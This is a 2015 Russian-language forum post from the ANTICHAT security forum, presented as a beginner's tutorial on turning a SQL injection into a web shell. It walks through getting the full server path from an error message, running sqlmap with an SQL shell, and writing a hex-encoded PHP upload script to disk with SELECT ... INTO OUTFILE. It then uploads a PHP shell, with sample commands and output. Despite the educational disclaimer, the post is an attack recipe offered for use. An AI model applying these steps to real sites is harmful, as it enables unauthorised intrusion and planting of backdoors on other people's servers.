HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.05.2015, 12:14
Bezlishke
Новичок
Регистрация: 18.05.2015
Сообщений: 26
Провел на форуме:
9828

Репутация: 3
По умолчанию

Доброго времени суток, друзья.

Я давно натыкался на статейку, сейчас уже не могу её найти. Но думаю вам будет интересно почитать.

Сразу говорю, статья не для пропентестеров, а для тех кто только начинает свой путь в этой сфере. Не судите строго...

Для начала нам понадобится:

1) PHPSHell

2) SQLmap

3) Скрипт на пхыеСкрипт аплоада на Пых'е

=============================

Первым делом, после того как мы нашли уязвимость, нам надо получить FPD. Варинтов множество, но мне обычно подходит Array[] Parameter инъекция.

Цитата:
Сообщение от None  
И получаем ожидаемое.

Цитата:
Сообщение от None  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
Далее нам нужно перевезти код "нашего" скрипта для аплоада в hex. На выхлопе мы получаем незатейливый кодец и стремительно запускаем скульмап. Для получения максимальной информации я стараюсь убить двух зайцев сразу, чего и вам советую. Помимо того, что мы хотим попасть в шелл SQL было бы славно познакомиться с базой.

Цитата:
Сообщение от None  
python sqlmap.py --url=
http://www.example.com/index.php?id=1
--random-agent -f --dbs --tables --thrads 10 --sql-shell
Перед нашими глазами воспрянет:

Цитата:
Сообщение от None  
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Наша команда должна иметь вид:

Код:
SELECT 0xНаш_хекс_код INTO OUTFILE "Полный/путь/и_имя/файла.php";
Допустим мы назвали его upload.php, значит дико-бешено бежим на http://www.example.com/upload.php. Заливаем шелл и занимаемся его поиском. После чего можно логиниться на него и продолжать идти к намеченной цели.

===========

Работает это только на MySQL и только с file-priv "Y"

Статья написана в ознакомительных целях, только для расширения кругозора новичков. Автор не несёт ответственности на её использование.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.